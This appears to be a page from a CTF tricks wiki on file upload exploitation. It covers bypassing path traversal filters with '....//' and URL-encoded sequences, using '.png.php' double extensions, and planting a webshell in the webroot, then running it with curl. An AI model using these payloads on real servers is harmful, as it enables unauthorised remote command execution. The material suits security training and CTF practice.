> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/vulnerability-exploitation/web-vulnerability-exploitation-file-upload.md).

# File Upload

## File Upload Path Traversal Bypass

When a web application filters path traversal sequences like `../` from uploaded filenames, redundant or encoded variations can sometimes bypass the filter. A common technique is using `....//` which, after one pass of stripping `../`, resolves to `../`. This can be effective if the application only removes the sequence once.

Intercept the file upload request (e.g., in Burp Suite) and modify the filename parameter. For instance, if the target strips `../` non-recursively:

```
filename: ....//web_shell.png.php
```

After the filter processes `....//`, it might become `../`, potentially placing the file in the webroot instead of an intended upload directory (like `/uploads`). The double extension `.png.php` can sometimes bypass simple extension checks by tricking the application into thinking it's an image file while still being processed by the server as PHP.

Another approach involves using URL encoding or other encodings to obfuscate the traversal sequence. Common encodings for `../` include:

```
%2e%2e%2f  (../)
%2e%2e/    (../)
..%2f      (../)
%2e./      (../)
.%2e/      (../)
%2e%2e%5c  (..\)
%2e%2e\    (..\)
..%5c      (..\)
```

These can be combined with the filename payload. For example, to upload a file called `shell.php` to the webroot directory, one could try:

```
filename: %2e%2e%2f%2e%2e%2f%2e%2e%2fshell.php
```

This attempts to traverse up three directories from the expected upload location.

Once uploaded, access the file to execute the webshell:

```bash
curl http://localhost:9000/web_shell.png.php?cmd=id
```
